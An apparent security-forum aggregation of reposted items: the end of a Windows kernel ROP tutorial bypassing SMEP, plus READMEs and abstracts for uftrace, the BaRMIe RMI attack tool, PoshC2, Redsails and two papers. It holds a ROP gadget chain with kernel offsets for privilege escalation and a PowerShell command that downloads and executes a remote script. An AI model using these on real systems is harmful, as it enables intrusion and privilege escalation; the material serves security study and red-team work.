code address is being checked (if the hardware offers that possiblety) if its a user space address or kernel mode address. if it was found that the code is marked as user space the kernel will stop the execution flow with a critical error, bsod. so if we will simply try to exploit a stack overflow like we did on windows 7, we will get this outcome: so the main idea in rop is to make the execution flow throw a kernel executable address that can pass the check until we can execute our own payload. enough talk lets debug!!! assuming that you have set up the environment as stated above, and you have a working machine, then open an administrator command, and type as follow: b4 running anything hit break on the debugger (open debug window and click break), next open view -> registers. scoll all the way down and the resault should be: next up type g and hit enter the machine should be running as normal, run the sample exe that i have provided, you should get a break point and this output should go on the debugger: as you can see this break point is different from the one we hit b4. first take a look at the address that triggered the break point: at the break point b4 we hit : 0xfffff80391595050 cc int 3 and now we got: Break instruction exception - code 0x80000003 (first chance) 0x0000017039f00046 cc int 3 as you can see the first address is a kernel space address and the second a user address. this is becouse i have place xcc in my shellcode. next up open the registers again the outcome should be as follows: you may ask yourself, why is cr4 register changed and how is it that we do not get the bsod msg as b4? well becouse the binary build a rop chain as follows: // To better align the buffer, // it is usefull to declare a // memory structure, other-wise you will get holes // in the buffer and end up with an access violation. typedef struct _RopChain { PUCHAR HvlEndSystemInterrupt; PUCHAR Var; PUCHAR KiEnableXSave; PUCHAR payload; // PUCHAR deviceCallBack; } ROPCHAIN, *PROPCHAIN; // Pack The buffer as: ROPCHAIN Chain; // nt!HvlEndSystemInterrupt+0x1e --> Pop Rcx; Retn; Chain.HvlEndSystemInterrupt = Ntos + 0x17d970; // kd> r cr4 // ...1506f8 Chain.Var = (PUCHAR)0x506f8; // nt!KiEnableXSave+0x7472 --> Mov Cr4, Rcx; Retn; Chain.KiEnableXSave = Ntos + 0x434a33; meaning that we have sent the vuln driver a stack overflow buffer, but instead of supplying our shell code we have given the driver the buffer above that is first composed of: Pop Rcx <-- kernel mode address Retn 0x506f8 Mov Cr4, Rcx Retn (ShellCodeAddress) So basically we have "jump" to our shellcode from other kernel mode address's so we did not got the bsod, simply cuz we have given the kernel a kernl-mode address so we passed the check, next up we flipped the bit on the cr4 register value to trick the system that smep is not supported on the firmware. we can see that by running kv command. you can see the kernel mode address on the stack call and can see the execution flow, as well as the nop's we have placed in our buffer. hit g again and you should see the below outcome: as you can see we have hit access violation, this is becouse in this demo i did not fix the return address pointer, so we can do this together, hit r on the debugger: as you can see the stack is a mess & the registers as well, the return address try's to read a pointer from rax, that is pointing to zero address, so we got access violation. so like we had to "jump" to our shell code to avoid SMEP, we need to jump back to a reasonable state, but how can we know what is a good address to jump back to? when we looked at the stack b4 we could see the execution flow, So 0x00007fffb29013aa the lowest address called the ioctl then we got to our shellcode from the overflow (the nop's), a good thing to do would be to make a return to one of our original call's on the stack to resume execution. if we take a look at 0x00007fffb29013aa we can see its marked as UREV user executable, so if we will jump to that address we will be in the same situation as b4 (bsod) so we need to find another place on the stack to jump to. lets see about nt!IofCallDriver+0x59 that is on the stack as well, we can even see what code is contained at this location running the below command: So we can see that this function simply returns back to the caller and is also KREV kernel exec. so it will be a good choise. while i was finding gadgets i was doing exactly the same, looking for KREV address that contain good code for me like mov cr4, rcx. with the 'u' command on the kd. ok, but how can we jump to that address? open up the registers again and copy the first instruction address in the output of kd> u nt!IofCallDriver+0x59 as follows: place it in rip (in view registers..) now hit g again. back in box you should have a command running as local system. So this is the end of the tutorial, i hope it will be usefull, now you know a bit more about ROP, and got some basic tools to build your own rop chain. my example code can be found here: C0de. and i challenge you to fix the return address programmatically! for more information please go to the main readme of this project and go to the links provided (how to find gadgets rop smep.. etc..) Sursa: https://github.com/akayn/demos/tree/master/Tutorials
-
- 1
-
-
uftrace The uftrace tool is to trace and analyze execution of a program written in C/C++. It was heavily inspired by the ftrace framework of the Linux kernel (especially function graph tracer) and supports userspace programs. It supports various kind of commands and filters to help analysis of the program execution and performance. Homepage: https://github.com/namhyung/uftrace Tutorial: https://github.com/namhyung/uftrace/wiki/Tutorial Chat: https://gitter.im/uftrace/uftrace Features It traces each function in the executable and shows time duration. It can also trace external library calls - but only entry and exit are supported and cannot trace internal function calls in the library call unless the library itself built with profiling enabled. It can show detailed execution flow at function level, and report which function has the highest overhead. And it also shows various information related the execution environment. You can setup filters to exclude or include specific functions when tracing. In addition, it can save and show function arguments and return value. It supports multi-process and/or multi-threaded applications. With root privilege, it can also trace kernel functions as well( with -k option) if the system enables the function graph tracer in the kernel (CONFIG_FUNCTION_GRAPH_TRACER=y). How to use uftrace The uftrace command has following subcommands: record : runs a program and saves the trace data replay : shows program execution in the trace data report : shows performance statistics in the trace data live : does record and replay in a row (default) info : shows system and program info in the trace data dump : shows low-level trace data recv : saves the trace data from network graph : shows function call graph in the trace data script : runs a script for recorded trace data You can use -? or --help option to see available commands and options. $ uftrace Usage: uftrace [OPTION...] [record|replay|live|report|info|dump|recv|graph|script] [<program>] Try `uftrace --help' or `uftrace --usage' for more information. If omitted, it defaults to the live command which is almost same as running record and replay subcommand in a row (but does not record the trace info to files). For recording, the executable should be compiled with -pg (or -finstrument-functions) option which generates profiling code (calling mcount or __cyg_profile_func_enter/exit) for each function. $ uftrace tests/t-abc # DURATION TID FUNCTION 16.134 us [ 1892] | __monstartup(); 223.736 us [ 1892] | __cxa_atexit(); [ 1892] | main() { [ 1892] | a() { [ 1892] | b() { [ 1892] | c() { 2.579 us [ 1892] | getpid(); 3.739 us [ 1892] | } /* c */ 4.376 us [ 1892] | } /* b */ 4.962 us [ 1892] | } /* a */ 5.769 us [ 1892] | } /* main */ For more analysis, you'd be better recording it first so that it can run analysis commands like replay, report, graph, dump and/or info multiple times. $ uftrace record tests/t-abc It'll create uftrace.data directory that contains trace data files. Other analysis commands expect the directory exists in the current directory, but one can use another using -d option. The replay command shows execution information like above. As you can see, the t-abc is a very simple program merely calls a, b and c functions. In the c function it called getpid() which is a library function implemented in the C library (glibc) on normal systems - the same goes to __cxa_atexit(). Users can use various filter options to limit functions it records/prints. The depth filter (-D option) is to omit functions under the given call depth. The time filter (-t option) is to omit functions running less than the given time. And the function filters (-F and -N options) are to show/hide functions under the given function. The -k option enables to trace kernel functions as well (needs root access). With the classic hello world program, the output would look like below (Note, I changed it to use fprintf() with stderr rather than the plain printf() to make it invoke system call directly): $ sudo uftrace -k hello Hello world # DURATION TID FUNCTION 1.365 us [21901] | __monstartup(); 0.951 us [21901] | __cxa_atexit(); [21901] | main() { [21901] | fprintf() { 3.569 us [21901] | __do_page_fault(); 10.127 us [21901] | sys_write(); 20.103 us [21901] | } /* fprintf */ 21.286 us [21901] | } /* main */ You can see the page fault handler and the write syscall handler were called inside the fprintf() call. Also it can record and show function arguments and return value with -A and -R options respectively. The following example records first argument and return value of 'fib' (fibonacci number) function. $ uftrace record -A fib@arg1 -R fib@retval fibonacci 5 $ uftrace replay # DURATION TID FUNCTION 2.853 us [22080] | __monstartup(); 2.194 us [22080] | __cxa_atexit(); [22080] | main() { 2.706 us [22080] | atoi(); [22080] | fib(5) { [22080] | fib(4) { [22080] | fib(3) { 7.473 us [22080] | fib(2) = 1; 0.419 us [22080] | fib(1) = 1; 11.452 us [22080] | } = 2; /* fib */ 0.460 us [22080] | fib(2) = 1; 13.823 us [22080] | } = 3; /* fib */ [22080] | fib(3) { 0.424 us [22080] | fib(2) = 1; 0.437 us [22080] | fib(1) = 1; 2.860 us [22080] | } = 2; /* fib */ 19.600 us [22080] | } = 5; /* fib */ 25.024 us [22080] | } /* main */ The report command lets you know which function spends the longest time including its children (total time). $ uftrace report Total time Self time Calls Function ========== ========== ========== ==================================== 25.024 us 2.718 us 1 main 19.600 us 19.600 us 9 fib 2.853 us 2.853 us 1 __monstartup 2.706 us 2.706 us 1 atoi 2.194 us 2.194 us 1 __cxa_atexit The graph command shows function call graph of given function. In the above example, function graph of function 'main' looks like below: $ uftrace graph main # # function graph for 'main' (session: 8823ea321c31e531) # backtrace ================================ backtrace #0: hit 1, time 25.024 us [0] main (0x40066b) calling functions ================================ 25.024 us : (1) main 2.706 us : +-(1) atoi : | 19.600 us : +-(1) fib 16.683 us : (2) fib 12.773 us : (4) fib 7.892 us : (2) fib The dump command shows raw output of each trace record. You can see the result in the chrome browser, once the data is processed with uftrace dump --chrome. Below is a trace of clang (LLVM) compiling a small C++ template metaprogram. The info command shows system and program information when recorded. $ uftrace info # system information # ================== # program version : uftrace v0.6 # recorded on : Tue May 24 11:21:59 2016 # cmdline : uftrace record tests/t-abc # cpu info : Intel(R) Core(TM) i7-3930K CPU @ 3.20GHz # number of cpus : 12 / 12 (online / possible) # memory info : 20.1 / 23.5 GB (free / total) # system load : 0.00 / 0.06 / 0.06 (1 / 5 / 15 min) # kernel version : Linux 4.5.4-1-ARCH # hostname : sejong # distro : "Arch Linux" # # process information # =================== # number of tasks : 1 # task list : 5098 # exe image : /home/namhyung/project/uftrace/tests/t-abc # build id : a3c50d25f7dd98dab68e94ef0f215edb06e98434 # exit status : exited with code: 0 # elapsed time : 0.003219479 sec # cpu time : 0.000 / 0.003 sec (sys / user) # context switch : 1 / 1 (voluntary / involuntary) # max rss : 3072 KB # page fault : 0 / 172 (major / minor) # disk iops : 0 / 24 (read / write) How to install uftrace The uftrace is written in C and tried to minimize external dependencies. Currently it requires libelf in elfutils package to build, and there're some more optional dependencies. Once you installed required software(s) on your system, it can be built and installed like following: $ make $ sudo make install For more advanced setup, please refer INSTALL.md file. Limitations It can trace a native C/C++ application on Linux. It cannot trace already running process. It cannot be used for system-wide tracing. It supports x86_64 and ARM (v6 or later) and AArch64 for now. License The uftrace program is released under GPL v2. See COPYING file for details. Sursa: https://github.com/namhyung/uftrace
-
- 1
-
-
BaRMIe BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls, however RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, however even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64-bits/9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network. Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar Disclaimer BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program. Usage Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information. $ java -jar BaRMIe.jar ▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████ ▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀ ▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███ ▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄ ░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒ ░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░ ▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ v1.0 Java RMI enumeration tool. Written by Nicky Bloor (@NickstaDB) Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Usage: BaRMIe -enum [options] [host] [port] Enumerate RMI services on the given endpoint(s). Note: if -enum is not specified, this is the default mode. BaRMIe -attack [options] [host] [port] Enumerate and attack the given target(s). Options: --threads The number of threads to use for enumeration (default 10). --timeout The timeout for blocking socket operations (default 5,000ms). --targets A file containing targets to scan. The file should contain a single host or space-separated host and port pair per line. Alternatively, all nmap output formats are supported, BaRMIe will parse nmap output for port 1099, 'rmiregistry', or 'Java RMI' services to target. Note: [host] [port] not supported when --targets is used. Reliability: A +/- system is used to indicate attack reliability as follows: [+ ]: Indicates an application-specific attack [- ]: Indicates a JRE attack [ + ]: Attack insecure methods (such as 'writeFile' without auth) [ - ]: Attack Java deserialization (i.e. Object parameters) [ +]: Does not require non-default dependencies [ -]: Non-default dependencies are required Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output. No Vulnerable Targets Identified? Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files. Attack Types BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door. 1. Attacking Insecure Methods The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this: //Get a reference to the remote RMI registry service Registry reg = LocateRegistry.getRegistry(targetHost, targetPort); //Get a reference to the target RMI object Foo bar = (Foo)reg.lookup(objectName); //Call the remote executeCommand() method bar.executeCommand(cmd); 2. Deserialization via Object-type Paraeters Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below: public void setOption(String name, Object value); public void addAll(List values); 3. Deserialization via Illegal Method Invocation Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below: public void setName(String name); public Long add(Integer i1, Integer i2); public void sum(int[] values); The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them. Sursa: https://github.com/NickstaDB/BaRMIe
-
- 2
-
-
PoshC2 PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework. Find us on #Slack - poshc2.slack.com Requires only Powershell v2 on both server and client C2 Server Implant Handler Quick Install powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')" Team Server Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler Wiki: For more info see the GitHub Wiki Welcome to the PoshC2 wiki page Sursa: https://github.com/nettitude/PoshC2
-
Abstract—With the rise of attacks using PowerShell in the recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5, however this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, which is explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis. Download: https://arxiv.org/pdf/1709.07508.pdf
-
Redsails About A post-exploitation tool capable of: maintaining persistence on a compromised machine subverting many common host event logs (both network and account logon) generating false logs / network traffic Based on [PyDivert] (https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. Built for Windows operating systems newer than Vista and Windows 2008 (including Windows 7, Windows 8 and Windows 10). Dependencies Redsails has dependencies PyDivert and WinDivert. You can resolve those dependencies by running: pip install pydivert pip install pbkdf2 Pycrypto is also needed. easy_install pycrypto Pycrypto may have a dependency on [Microsoft Visual C++ Compiler for Python 2.7] (http://aka.ms/vcpython27) Usage Server (victim host you are attacking) redSails.py Or if the victim does not have python installed, you can run provided exe (or compile your own! instructions below) `redSails.exe Client (attacker) redSailsClient.py <ip> <port> Creating an executable To compile an exe (for deployment) inlieu of the python script, you will need pyinstaller: pip install pyinstaller Then you can create the exe: pyinstaller-script.py -F --clean redSails.spec License Copyright (C) 2017 Robert J. McDown, Joshua Theimer This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/. Sursa: https://github.com/BeetleChunks/redsails
-
Abstract—Developing an approach to test cryptographic hash function implementations can be particularly difficult, and bugs can remain unnoticed for a very long time. We revisit the NIST SHA-3 hash function competition, and apply a new testing strategy to all available reference implementations. Motivated by the cryptographic properties that a hash function should satisfy, we develop four types of tests. The Bit-Contribution Test checks if changes in the message affect the hash value, and the Bit-Exclusion Test checks that changes beyond the last bit of the message leave the hash value unchanged. We develop the Metamorphic Update Test to verify that messages are processed correctly in chunks, and then use combinatorial testing methods to reduce the test set size by several orders of magnitude while retaining the same fault detection capability. Our tests detect bugs in 41 of the 86 reference implementations submitted to the SHA-3 competition, including the rediscovery of a bug in all submitted implementations of the SHA-3 finalist BLAKE. This bug remained undiscovered for seven years, and is particularly serious because it provides a simple strategy to modify the message without changing the hash value that is returned by the implementation. We will explain how to detect this type of bug, using a simple and fully-automated testing approach. Download: https://eprint.iacr.org/2017/891.pdf